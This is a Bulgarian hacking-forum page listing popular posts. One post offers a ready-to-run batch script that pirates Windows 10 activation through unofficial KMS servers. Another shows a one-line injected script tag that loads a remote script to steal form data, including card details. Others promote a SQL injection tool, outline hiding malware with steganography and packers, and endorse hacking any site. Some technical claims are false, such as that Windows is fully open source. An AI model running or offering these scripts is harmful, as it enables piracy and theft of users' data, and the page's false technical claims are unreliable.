Jump to content
¯\_( ツ)_/¯
  • TAD GROUP are currently hiring penetration testers. Please read the topic in Career Central subforum.
  • Sponsored Ad
ТУК НЕ СЕ ПРЕДЛАГАТ ХАКЕРСКИ УСЛУГИ ! ×

Leaderboard


Popular Content

Showing content with the highest reputation since 08/22/2019 in all areas

  1. 3 points
    Николчев, Ти ако на приятелката си нямаш вяра, не знам на кого имаш. Ти тази, коятоо наричаш своя приятелка искаш да издъниш, а акакво ни дава гаранция, че утре или вдругиден нас, скромните труженици, няма да издъниш пред официалните институции (я виж с НАП какво стана). Ще ни посочиш с пръст и ще кажеш: Тези ме научиха как през рутера да вляза в компа на кифлата! Те са! Ще ни заклеймиш, значи, като един същий Юда Искариот и ще ни създадеш проблеми (не че и сега си нямаме). То по-добре вместо да се занимаваш с глупости вземи та попрочети какво е това рутер, как рутера работи, какво е TCP/IP и ползва ли го приятелката ти. Четене му е майката и тогава ще да получиш прозрение свише. A Windows-а, приятелю не е какъвто беше, Захитряха гадовете и направиха живота ни тежък. Има и едни отчети, дето казват кой кога къде е влизал и какво е търсил, а я си представи, че приятелката ти вземе та разбере за тях? Знаеш ли ти, млади момко, какво е семеен скандал и на какво е способна една жена, ако разбере, че се съмняваш в нея? С жена на глава се не излиза. Само не се занимавай с жени, защото жените, колите и парите само проблеми създават и от тях иде човешкото страдание. Послушай стареца и наблегни на учебниците.
  2. 2 points
    Само да вметна, Така посочената методика обективно погледнато е "измама", а не процес,при който се постига контрол над профила, в резултат на задълбочено познаване на internet технологиите. Този метод залага на първосигнална реакция. Потребителят САМ предоставя нужната информация, защото е подвведен. Тук става дума по-скоро за психологическа реакция, отколкото за техническо решение.
  3. 2 points
    Тук говорим за тестване на собствени проекти преди пускане в продукция. Идеята е просто да се потърсят слабости в системата, които могат да доведат до проблеми в публичната част на проекта. Естествено, програмите ще се използват и за анализиране на сайтове на клиенти, желаещи подобряване на тяхната защита. Така или иначе всеки сам може да си създаде подобна програма, но е глупаво да го правиш, щом хората са се постарали да го направят удобно и лесно четимо. Много готини инструменти са това. Очаквам още предложения за готини програмки за анализ на SEO или SQLi и XSS атаки.
  4. 2 points
    WebCruiser е прекрасен инструмент за анализ на уязвимости. Ако позволите две думи как функционира. Това е типичен web-crowler. Първо "сканира URL адреса и установява къде физически са разположени отделните странници на web-ресурса. Напълно възможно е отделните компоненти да са разположени на различни физически устройства (сървъри с различни IP-адреси). Следващата стъпка е анализ на HTML кодовете (ах, тези браузъри) и извличане на всички препратки към скриптовете. Тук искам да направя малко отклонение. Дори да сте написали index.php (или ASP или нещо подобно) спасение няма, защото скриптовете са ТЕКСТОВИ ФАЙЛОВЕ и като такива могат да бъдат разчетени. След като сте получили съдържанието на скриптовете няма как да не получите и скрипт, посредством който се извършва свързване (connection) със СУБД (базата данни. Всички connection string символни низове следват ЕДИН ОБЩ МОДЕЛ, което ги прави много лесни за анализ (някъде бях аписал, че ще се наричаме "анализатори"). Лично аз горещо ви препоръчвам да се запознаете със техническата документация. Повярвайте тя е невероятен инструмент. Ето ви нагледен пример, колко много може да научите за connection string от напълно ОФИЦИАЛЕН ИЗТОЧНИК (компанията зас тази информация е ORACLE): https://www.connectionstrings.com/mysql/ След като знаете кое какво е имате два варианта: 1. Варианта на начинаещият - проникване в базата посредством използване на SQL 2. Копиране на базата на локално устройство или друг сървър при използване на TCP. Кой от двата варианта е по-добър не мога да кажа. Ако имате голяма СУБД ще трябва да сваляте с месеци, при това следвайки определени процедури за сигурност. Предимството обаче е, че в този случай няма да ви се налага да "хаквате" базата. Трабва ви просто бай-обикновен ТЕКСТОВИ РЕДАКТОР, защото както скриптовете, така и масово използваните бази данни не са нищо повече от ТЕКСТОВИ ФАЙЛОВЕ. За вас е важно съдържанието им, а то се достъпва с обикновен PE2 редактор и може да го четете като роман. Но ... Да видим какво правим, когато имаме голяма база данни. Там е важно да се получи т.н. СХЕМА. И тук може да видите ролята на WebCruiser. На практика той иззема функциите на т.н. "бизнес слой" и анализира структурата на СУБД. От там насетне вие реално виждате всички записи и полета в отделните таблици, от които е изградена базата. Така функционира WebCruiser. Механизмът е изключително ефективен, най-вече поради своята простота. Срещу какво е безсилен? Безсилен е ако позлвате SSQL или други подобни решения. Тогава POST или GET заявките са напълно безполезни. Реално една псевдо SQL заявка ще има вида: "table_name = query1, query2; ... ueryN", а това няма как да се използва за SQL injection. За да ме разберете, ето едно и също нещо записано с SQL и със SSQL: SQL заявка SELECT customer_name FROM customers WHERE (first_name LIKE 'A%') AND (last_name LIKE 'B%') SSQL заявка customer_name: first name = A..; last_name = B.. И при двете заявки искаме от таблицата customer_name да получим списък с лица, чието първо име започва с A, а фамилията започва с B. При SSQL ; e AND, a , e OR. Разликата е очевидна, но във вторият случай SQL инжекциите са невъзможни. Тогава ще се налага да се свали цялата база под форма на архивно копие, но ... Това вече е друга тема. Мисля, че WebCruiser e много силен инструмент за анализ на уязвимостите, при стандартни решения. Въпросът е колко експерти по "индустриално разузнаване" (моля да не се бърка със "икономически шпионаж", защото са много различни) биха използвали SQL инжекция, когато могат да достъпят директно текстовите файлове (достъп на физическо ниво), които на практика са СУБД и да извлекат информация директно без да разполагат с административни привилегии. В този случай е добре да се контролира трафика (входящи и изходящи пакети) за да се установи дали докато ние пазим портите на замъка, информацията не "изтича" през прозорците или директно не се изхвърля от главната кула. Но пак повтарям, че лично на мен WebCruiser ми е много симпатичен. Знаете ли защо ми е симптична? ЗАЩОТО Е WebCruiser ТИПИЧЕН OUT OF BROWSER ПРОДУКТ! Това на мнозина никак няма да се понрави, но е факт. Локално приложение, което е създадено да върши работа, а не web ресурс, който не се знае как работи и какво върши. А ето и как в Русия използват WebCruiser. Мисля, че статията е написана много добре. https://lolzteam.net/threads/153417/
  5. 1 point
    Благодаря! Ще се преместя на Kali Linux и се надявам там проблема да го няма.
  6. 1 point
    @echo off title Windows 10 ALL version activator&cls&echo ************************************ &echo Supported products:&echo - Windows 10 Home&echo - Windows 10 Professional&echo - Windows 10 Enterprise, Enterprise LTSB&echo - Windows 10 Education&echo.&echo.&echo ************************************ &echo Fucking Windows 10 activation ... cscript //nologo c:\windows\system32\slmgr.vbs /ipk TX9XD-98N7V-6WMQ6-BX7FG-H8Q99 >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk 3KHY7-WNT83-DGQKR-F7HPR-844BM >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk PVMJN-6DFY6-9CCP6-7BKTT-D3WVR >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk MH37W-N47XK-V7XM9-C7227-GCQG9 >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk NW6C2-QMPVW-D7KKK-3GKT6-VCFB2 >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk NW6C2-QMPVW-D7KKK-3GKT6-VCFB2 >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk 2WH4N-8QGBV-H22JP-CT43Q-MDWWJ >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk NPPR9-FWDCX-D2C8J-H872K-2YT43 >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4 >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk WNMTR-4C88C-JK8YV-HQ7T2-76DF9 >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk 2F77B-TNFGY-69QQF-B8YKP-D69TJ >nul echo ************************************ &echo.&echo.&set i=1 :server if %i%==1 set KMS_Sev=kms.chinancce.com if %i%==2 set KMS_Sev=NextLevel.uk.to if %i%==3 set KMS_Sev=GuangPeng.uk.to if %i%==4 set KMS_Sev=AlwaysSmile.uk.to if %i%==5 set KMS_Sev=kms.chinancce.com if %i%==6 set KMS_Sev=kms.shuax.com if %i%==7 exit cscript //nologo c:\windows\system32\slmgr.vbs /skms %KMS_Sev% >nul Да добавя и аз нещо полезно
  7. 1 point
    Знаете ли, че броя на така наречени бесарабските българи, с другите думи, българите, които живеят на территория на Украйна, е по-голямо от 200 хиляди души? Ние можем да сравним това с населението на Бургас, най-големият град в Юго-Източната България! С нарастване на националистическите настроения в Украйна, благополучието на нашият голям етнос е поставено на риск. През последните пет години на правление на "демократичния режим" се случили няколко промени не е в по-добро състояние. Например, след като през 2012 година в силата влез законът за националния език, ние беше забранени да преподава български език в училища и университети. Също, езикът на чиновническа работа беше променен на украинския, това се отрази негативно на нивото на правна култура на нашата общност, в която 60% не знаят и никога не са учили украински. Освен проблем свързан с език, съществува проблем свързан с армията. Местните власти в Одеска и Запорожска области, на вълна на всеобща мобилизация във връзката с военните действия в югоизточната част на Украйна, са започнали повикване на българите в Въоръжени сили на Украйна. Правоприлагащи органи не реагират на отворени действия от страната на украинските националисти. Например, през 3 март 2017г, в Деня на освобождението на България от турско робство, в Болград паметникът на българската милиция е бил осквернен и залит с боя: написаха върху "Куфар, гара, София". Но националисты не спря. През 18 май 2017г. нашият представител, член на исполком на град Белгород-Днестър Василий Кашчи с извикванета "украинска земя на украинци" е бил бит, обсипан с блестящо зелено и набит в кошче. Причината на това беше че той се отказва да гласува за отпускане на земя за строителството на храм на Православната църква на Украйна. Бившият лидер на одеския клон на "Десния сектор" Сергей Стерненко ръководи тази акция. Депутатът от Върховната Рада и едновременно с това ръководителят на Асоциацията на българите в Украйна помоли Службата за сигурност на Украйна да разбере тази на пръв поглед очевидна ситуация, но все още няма ясен доклад за събитията, което са се случили. Дори наказателното дело по статията "Хулиганство" бе прекратено. В същото време СБУ яростно преследва българите, които отказаха да се бият в Донбас на страната на Киев. Ярък пример е историята на жител на Запорожие Виталий Дрозд, който след излизане от зоната на войната взе семейството си и замина за България, опасявайки се от репресия от "Десния сектор". Според заявлението на министъра на външните работи на Украйна Павел Климкин, само 20 българи в момента служат в Въоръжените сили на Украйна. Тази цифра беше опровергана от депутата от Европейския парламент от България Ангел Джамбазки. Според него броя на сънародниците, загинали в югоизточната част на Украйна е по-голям. Според Антон Киссе 6 хиляди българи се намират в зоната на военния конфликт. Стигна се дотам, че жителите на село Кулевча, Одеска област, трябваше да изгонят украинските военни комисари, които пристигнат да връчат призовките. След това бесарабские българи изпратиха колективен апел до областна администрация, в който нарекоха мобилизацията незаконна и съобщтиха, че не възнамеряват да тръгват на война и жестоко ще потиснат всякакви опити да отнемат роднините си със сила. Също така не може да не се спомене разпръснатото на мирната демонстрация в Одеса на 19 април 2017г., при която протестиращите поискаха да спрат потисничеството на българското малцинство от украинските власти. Бесарабските българи поискаха промяна на административно-териториалното разделение на страната и създаване на автономен регион с център в Болград. Областният съвет на Одеса подкрепи тази инициатива, но въпросът не беше разгледан в рамките на заседанието на Върховна Рада, което е нарушение на законите на Украйна и международните харти, призоваващи да вземат предвид етническите особености на региона при административно-териториалното деление. Българското правителство ни предложи опростена форма за получаване на гражданство, за да избягаме от всички тези проблеми. Страната е готова да приеме всеки, който чувства не като бежанци, а като пълноправни граждани, и се отпускат жилищни субсидии. Само аз лично не мога да си представя, как някой може да започне живота си заново, дори в приятелска страна. Бесарабските българи искат стабилност в региона, а не бягат от Украйна. Други национални малцинства, живеещи на територията на Украйна, искат същтото: унгарци, поляци, русини, гагаузи. Те, като ние, искат самоуправление и възможност в рамките на своите общности да решават възникналите проблеми, не искат да се борят и още повече умират за идеалите на така наречения демократичен режим. Украинските власти внимателно прикриват тези факти на потисничество на националните малцинства, живеещи в държавата, защото всичко това излага управляващия елит в негативна свелина. Струва ми се, че световната общност трябва да знае какво наистина се случва в Украйна. Постоянните нарушения на законите на страната и международните харти водят до изостряне на етническите конфликти, които дестабилизират и без това несигурната ситуация в държавата.
  8. 1 point
    + да направиш всичко възможно да не влезеш в затвора. 😁
  9. 1 point
    Влизането в компютър не е лесна работа особено ако е лаптоп. Ще ти бъде твърде тясно да се поместиш дори и да си джудже. 🤣 Шегата на страна, иначе напълно подкрепям @Avatara.
  10. 1 point
    Здравейте, Ако наистина искате да направите нещо сериозно е добре преди това да се запознаете със стеганографията и как тя функционира. Това, което познавате като Windows 10, няма нищо общо с професионалните версии, а още по-малко с това, което се тества в момента. Дори да направите едно сравнително добро решение, то ще има кратък живот. Това се нарича "процедура на обезсмисляне на атаката". Идеята е следната: Вие желаете да имплементирате зловреден софтуер. За да направите това е нужно да използвате времеви ресур, а също така ще имате и редица амортизационни и експлотационни разходи. Ако динамиката на една система е такава, че изисква ревърс инженерингът да се извършва през много кратки периоди от време, това ще струва по-скъпо от самата система. Яко, а? Съвсем друг въпрос е как системата разпознава дали един код е вирус или не е? Ако бяхте регистриран MIcrosoft разработчик и се бяхте запознали с документацията, кото се предосртавя напълно безплатно (повече от двадесет години Windows е с напълно отворен код, за разлика от Linux, който грижливо крие ядрото си), нямаше как да не знаете, че реално проверката се извършва въз основа на анализ на символни низове. Има и още нещо ... Всички съвременни вируси, които познавате са автоматично генерирани. Софтуерното решение за това бе разработено много отдавна от един колега, който е арменец, но успешно се прилага и до днес (за справка дори Duqu - https://en.wikipedia.org/wiki/Duqu ) бе направен по този начин, независимо от глупостите, които после бяха изписани. Блаженнио са невежите защото тях им се въздава с фурнаджийската лопата. Тази "машина за вируси" все още е достъпна в мрежата и с нейна помощ буквално се правят чудеса (не в Dark Net, a в светлата и изпълнена с ровозодупести херовимчета мрежа). Проблемът при нея (а и при всички вируси) е че те се правят от хора, а това предполага субективизъм (колко научно звучи само, а). Всеки прави нещата според собствените си познания и опит. Хубавото обаче е, че познанията и опита масово се свеждат до програмни езици, базирани на c логика и синтаксис, с всички произтичащи от това последствия (дано дълго да остане така, че конкуренцията е страшно нещо, а монопоът си е жива благодат). Още по-голяма грешкка е, когато някой реши, че ако направи нещо на assembler то ще е с пъти по-ефективно и незабележимо. Много млади програмисти са свършили професионалния си път, благодарение на тази велика заблуда. Когато някой иска да разбере "как да се промъкне по терлици в някоя ОС", е добре първо да се заеме със стеганографията или "прикриването на една информация в друга". Тук имаме различни подходи. Информацията обикновенно се крие в контейнер. Според един колега "контейнерите" биват 20, 40 и 50 футови, но той се занимава с логистика и не пие ракия. Има обаче и друго мнение, към което ние ще се придържаме. Контейнерите могат да бъдат аудио или видеофайлове, текстови файлове (текстова стеганография, която ми е любима, най-вече при т.н. "системи с отворен код", които никой не проверява), използване на цифрови изображения (не само в meta данните, а направо в пикселите на BMP, PNG, GIF и каквото там се сетиш ), пакетна стеганография (инжектиране на зловреден код в TCP/IP пакетите) и пр. и пр.. Хубаво, обаче тези, които противодействат на подобни "решения", не са глупаци и определено се радват на астрономически бюджети (само в САЩ има над три института, всеки един с бюджет, колкото този на България). А ние сме бедни и както се знае хлябът срува скъпо. Та колегите там знаят какво е анализ по празен контейнер, анализ на деформиран контейнер, сравнителен анализ и пр. и пр. и пр.. И една много интересна матиматика знаят гадовете, дето не се учи в университетите. И други неща знаят, то и за това им плащат заплати. Но ... Всеки един себеуважаващ се аналитик (така наричам хакерите) ползва собствена електронна поща, която когато получи цифрово изображение (примерно) не го отваря директно (както правят пощите на лузърите), а предвидливо го мащабира, ротира и пр, про запазване на качеството та да може де що е гадост вътре да бъде изцедена до капка. Това аналитиците са го възприели от онези в институтите. Това го нарича "да ручнеш контейнера". Тези гадове нямат вярва на дефендери, защити и антивирусни, което обаче не им пречи да ги ползват. Ние винаги трябва да се учим от онези, които знаят и могат пповече от нас самите. Ако проявяваш интерес по темата не е зле да се заемеш със задълбочено изучаване на Exchangeable Image File Format (EXIF) и какви прекраснио възможности предоставя това изчадие адово (родено от алчността на маркетолозите) на всеки, който иска да остане незабелязан. Благодарение на EXIF чудеса ще постигнеш по пътя, който си поел, но ... това е само началото. Все пак първо не е зле да се опоотърсиш от редица заблуди, като тази че JPEG е формат на графично изображение, а не начин за компресиране на графична информация, предоставящ ни огромни възможности да се надсмиваме на човешкото невежество. След като преминеш през това начално обучение е време да изучиш що е това аудио и как се ползва целесъобразно за пренос не само на звук. Там ще добиеш сили и самочувствие, но ... Най-важно е да се научиш как да имплементираш код в текстови файлове. Това вече е от сферата на черната магия. При имплементирането на текст в текст никога не бива да забравяш за размера на файла. Когато достигнеш до висините, да направиш проверка като набереш съобщението с обикновен текстови редактор и файла ти е със същата дължина като "обработения" може да ни се обадиш за да те приемем в групата на тези, които пият ракия и не се бръснат редовно. Там ще да те научим що е това пакетна обработка и колко е хубаво да се познават основите на информатиката и числените методи. И тогава ... Няма да има ОС, която да ти се опре. Нека силата бъде с теб. Дерзай и не забравяй, че никога не бива да правиш глупости, защото НПК е нещо сериозно и към него трябва да изпитваме боязън и преклонение.
  11. 1 point
    Дали ще е празна, значение няма. Въпроса е да се свърши качествено и коректно работата. Дали си решил, ако си открил уязвимост, да правиш бели е въпрос на морал и възпитание, нищо повече!!!
  12. 1 point
    Наистина за тази цел е прекрасна. Само отбелязвам, че ако на програмата се отдаде възможност - ще пише в базата с данни и във всички случаи ще е нещо, което не трябва да е там... затова си направете бекъп... Пък и никой не тества приложение на празна база просто е хабене на ресурс..
  13. 1 point
    жалко че не я довърших тая тема. В крайна сметка вируса се оказа RAT за windows 7, но беше packed. Та да дам малко акъл и аз. Когато се пише malware се използват различни техники за да се предпази гадината от reverse engineering и anti virus software, като идеята е да се скрие зловредния код. Аз познвам 3 вида такива (може и да са повече): Packers, Crypterrs и Protectors. 1. Пакерите се софтуер който динамично се разархивира(unpack) в паметта след стартиране. 2. Криптерите са следващото ниво. Кода е криптиран и това прави static binary analysis невъзможен, отново трябва да се разархивира в runtime за да се стигне до същноста на операцийте на този вирус. 3. Протекторите обикновено са комбинации от 1 и 2, за да те затруднят още повече при reverse engineering-a. Като в последно време чух че има и някакви който използват custom техники на виртуализация и така си обфускират дори сета от инструкции които използват, изправяйки анализатора пред още проблеми. трябва да си разчетеш, из нета има доста материал по темата. A ако обичаш да четеш: Practical Malware Analysis съсдърша много полезна информация за reverse engineering и malware разработки.
  14. 1 point
  15. 1 point
    Имам братле но трябва да видя най добрите и ще ти ги пратя ако искаш.
  16. 1 point
    Много готина програмка е WebCruiser-а. Благодаря ти много за нея!!! Safe3 ми дава само веднъж да тествам и иска някаква регистрация. Други програмки за пентестинг имаш ли?
  17. 1 point
    Здравейте, Ако ми позволите да вметна. Това, с което сте се сблъскали не винаги е идиотщина. Това е масово използван подход, когато се прилага стеганография. Вие сам казахте, че го ползват за изображения. Шрифтовете в редица случаи също са растерни изображения, масово използвани като контейнери при прилагане на стеганографски похвати. Категорично base64 е кодиране, но ... Ако позволите отново ще се върна на написаното от Вас, цитирам: "... ще получиш нов вид кодиране което само ти ще си го ползваш." И следва въпросът: А ако някой реши да провери какво е кодирано как ще го декодира, ако не разполага с изходната подредба? В този случак сме по-близо до това, което съм визирал в поста си. Да кажем, че желая две приложения да обменят информация само и единствено помежду си (също много често срещано изискване, поне в моята практика). Що се отнася до самите функции на кодиране и декодиране те са стандартни и за тях много е писано. Но дори в самите тях могат да бъдат направени почти незабележими подобрения, които да ги оптимизират. Много Ви благодаря за коментара.
  18. 1 point
    Ами то всички сайтове са за хакване. Не е легално но точно така се придобиват опит и знания. Истината е такава.
  19. 1 point
    Ще бъда кратък и надявам се ясен. В един пробит сайт, хакерът може да постави javascript код и по този начин може да открадне всички въведени данни от дадена форма. Не е нужно да инжектира целият дълъг код, а просто да се извика от отдалечен сървър под формата на <script src="http://drug-website/gaden-script.js"></script> По този начин се правят сериозни зулуми. Един от най-лощите сценарии е вграждането на такъв код в интернет магазин и кредитни карти например. Ето и един сайт обесняващ с демо, как става самото крадене. http://www.stealmylogin.com/demo.html Има и други техники но на тях ще се спра може би в някоя друга тема.
  20. 1 point
    ИЗВЪН КОНТЕКСТА ... Както знаете от 25 май тази година е в сила една директива, която лично аз бих квалифицирал като "твърде спорна". Та съгласно този документ някой би следвало да защитава "личните данни потребителите" (да се чете "това, което чайниците са споделили за себе си") от някакви хипотетични много, ама много лоши "хакери" (и не само), които виждате ли злоупотребявали с тях. Извинявайте, но ако следваме подобна логика, граничеща с абсурда е най-добре да премахнем internet (за да не се мъчим). Не знам дали "пишман законодателите" някога са чували за един протокол, чието име е Finger. Дълбоко се съмнявам, че много от "експертите" разработвали тази концепция имат и най-малка представа за какво служи този протокол, как функционира и каква е връзката му със социалните мрежи. Ако беше само Finger как да е. Все някак щяхме да го преживеем. Проблемът обаче е, че непрекъснато се забравя нещо много важно: ВСИЧКИ ТЕХНОЛОГИИ, СВЪРЗАНИ С INTERNET СА РАЗРАБОТВАНИ В УНИВЕРСИТЕТИ С ВСИЧКИ ПРОИЗТИЧАЩИ ОТ ТОВА ПОСЛЕДСТВИЯ! Разбирате ли ме за какво говоря? Едва ли. Какви са основните приоритети на студента (не само на българския)? 1. Да се напие (ако може безплатно). 2. Да оправи колежката (ако може и приятелката й). 3. Да повтори това няколко пъти (без това да има някакви сериозни последици). В тези три основни приоритета, някъде да видяхте думата "сигурност"? Сега да помислим за образа на средностатистическата потребителка на Facebok. Каката. Тя е около 30 годишна. Семейна или разведена. Има поне едно дете. Сравнително материално осигурена. Работи в офис. Сексуално и емоционално незадоволена. Скучаеща. Изпитваща остра нужда от внимание. Готова да покаже каквото е редно и каквото не е само и само за да бъде забелязана. Задължително е да е умна и най-вече красива. Всички трябва да го оценят. Много обича да се тагва и да споделя. Обожава междуметията и винаги мрази чалгата (което обаче не и пречи след третата водка да мята яростни гибеци). Това е. Има и друга група, които могат да се квалифицират като "малките припадки", които всячески се стремят да подражават на големите каки, но са много по-алчни и глупави (не, че другите не са). Третата категория е мъжка и повярвайте там е страшно. Де що е сган от специализираните форуми за запознанства, чиито речник се свежда до "Здр. Кво прайш. Мноо си готина. Добави ме за приятел.", е намерила втори роден дом в социалните мрежи. От тук следва уместният въпрос: КАК ВЪЗ ОСНОВА НА ТОВА ПОЗНАНИЕ СЕ ПРАВИ "СОЦИАЛЕН ИНЖЕНЕРИНГ"? Елементарният отговор е: При толкова много дебили, които не знаят какво искат и защо, защо да се занимаваме с подобен вид дейност? За какво са ми личните данни на подобни недоразумения? Това е като да се ровя във фекалийната канализация, просто заради спорта. Извинявайте, но някак не изпитвам влечние. И кого от кого да пазим? Да пазим възрастни хора с инфантилно поведение от тях самите? Моля ви. Това е несериозно.
  21. 1 point
    Вероятно това е хеадър, който връща сървъра: Internal Server Error 500 https://blog.superhosting.bg/internal-server-error-500.html Всякакви причини могат да доведат до него. Освен стандартните винаги може някой програмист да е прихванал някаква грешка от някъде и да е подал този хеадър като отговор.
  22. 1 point
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.